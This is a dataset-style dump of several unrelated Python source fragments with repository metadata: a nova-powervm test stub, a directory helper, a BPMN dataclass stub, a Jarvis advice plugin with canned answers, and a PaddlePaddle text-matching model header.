] | null | null | null | nova_powervm/tests/virt/powervm/test_mgmt.py | openstack/nova-powervm | 376d9493e2a10313068508daf9054d7ecf6d121f | [
"Apache-2.0"
] | 12 | 2015-10-26T17:38:05.000Z | 2021-07-21T12:45:19.000Z | # Copyright 2015, 2017 IBM Corp.
#
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
import retrying
from nova import exception
from nova import test
from pypowervm.tests import test_fixtures as pvm_fx
from pypowervm.tests.test_utils import pvmhttp
from nova_powervm.virt.powervm import exception as npvmex
from nova_powervm.virt.powervm import mgmt
LPAR_HTTPRESP_FILE = "lpar.txt"
| 40.093264 | 79 | 0.652106 |
621e1832f00c1f8797826395cfb9b871267408f4 | 960 | py | Python | tools.py | fairuzap97/psgan | 18d49d3d9e6dcb66e019764141fc855d04e4b25b | [
"MIT"
] | 29 | 2018-02-16T09:56:08.000Z | 2022-01-27T16:22:40.000Z | tools.py | fairuzap97/psgan | 18d49d3d9e6dcb66e019764141fc855d04e4b25b | [
"MIT"
] | null | null | null | tools.py | fairuzap97/psgan | 18d49d3d9e6dcb66e019764141fc855d04e4b25b | [
"MIT"
] | 16 | 2018-09-24T21:16:25.000Z | 2021-09-26T09:22:07.000Z | # -*- coding: utf-8 -*-
import sys, os
from time import time
def create_dir(folder):
    '''
    creates a folder (including parents), if necessary
    '''
    # exist_ok=True avoids the check-then-create race of the previous
    # os.path.exists() + os.makedirs() pair, where another process could
    # create the directory between the test and the call and crash us.
    os.makedirs(folder, exist_ok=True)
if __name__ == "__main__":
    # This module only provides helpers; running it directly does nothing.
    print("this is just a library.")
| 24.615385 | 145 | 0.591667 |
621e26224a5b7df57e76176ccf102f633408ef39 | 290 | py | Python | models/catch_event.py | THM-MA/XSDATA-waypoint | dd94442f9d6677c525bf3ebb03c15fec52fa1079 | [
"MIT"
] | null | null | null | models/catch_event.py | THM-MA/XSDATA-waypoint | dd94442f9d6677c525bf3ebb03c15fec52fa1079 | [
"MIT"
] | null | null | null | models/catch_event.py | THM-MA/XSDATA-waypoint | dd94442f9d6677c525bf3ebb03c15fec52fa1079 | [
"MIT"
] | null | null | null | from dataclasses import dataclass
from .t_catch_event import TCatchEvent
__NAMESPACE__ = "http://www.omg.org/spec/BPMN/20100524/MODEL"
| 24.166667 | 65 | 0.731034 |
621f31f3e4ecd411a063519956fdcb002c6f41f7 | 1,305 | py | Python | jarviscli/plugins/advice_giver.py | hugofpaiva/Jarvis | 8c7bec950fa2850cba635e2dfcb45e3e8107fbf2 | [
"MIT"
] | null | null | null | jarviscli/plugins/advice_giver.py | hugofpaiva/Jarvis | 8c7bec950fa2850cba635e2dfcb45e3e8107fbf2 | [
"MIT"
] | null | null | null | jarviscli/plugins/advice_giver.py | hugofpaiva/Jarvis | 8c7bec950fa2850cba635e2dfcb45e3e8107fbf2 | [
"MIT"
] | null | null | null | import random
from plugin import plugin
# Pool of canned responses the advice plugin picks from at random.
ANSWERS = [
    "No",
    "Yes",
    "You Can Do It!",
    "I Cant Help You",
    "Sorry To hear That, But You Must Forget :(",
    "Keep It Up!",
    "Nice",
    "Dont Do It Ever Again",
    "I Like It, Good Job",
    "I Am Not Certain",
    "Too Bad For You, Try To Find Something Else To Do And Enjoy",
    "Time Will Pass And You Will Forget",
    "Dont Do It",
    "Do It",
    "Never Ask Me About That Again",
    "I Cant Give Advice Now I Am Sleepy",
    "Sorry I Cant Hear This Language",
    "Sorry But Your Question Does Not Make Sense"
]
| 27.765957 | 65 | 0.556322 |
621f442528eb038457c4f4d99ef47c676a11ad6e | 3,204 | py | Python | PaddleRec/text_matching_on_quora/models/sse.py | suytingwan/models | ccdbfe77d071cc19b55fb9f4b738912e35d982ef | [
"Apache-2.0"
] | 5 | 2021-09-28T13:28:01.000Z | 2021-12-21T07:25:44.000Z | PaddleRec/text_matching_on_quora/models/sse.py | suytingwan/models | ccdbfe77d071cc19b55fb9f4b738912e35d982ef | [
"Apache-2.0"
] | 2 | 2019-06-26T03:21:49.000Z | 2019-09-19T09:43:42.000Z | PaddleRec/text_matching_on_quora/models/sse.py | suytingwan/models | ccdbfe77d071cc19b55fb9f4b738912e35d982ef | [
"Apache-2.0"
] | 3 | 2019-10-31T07:18:49.000Z | 2020-01-13T03:18:39.000Z | # Copyright (c) 2016 PaddlePaddle Authors. All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import paddle.fluid as fluid
from .my_layers import bi_lstm_layer
from .match_layers import ElementwiseMatching
| 39.073171 | 79 | 0.5902 |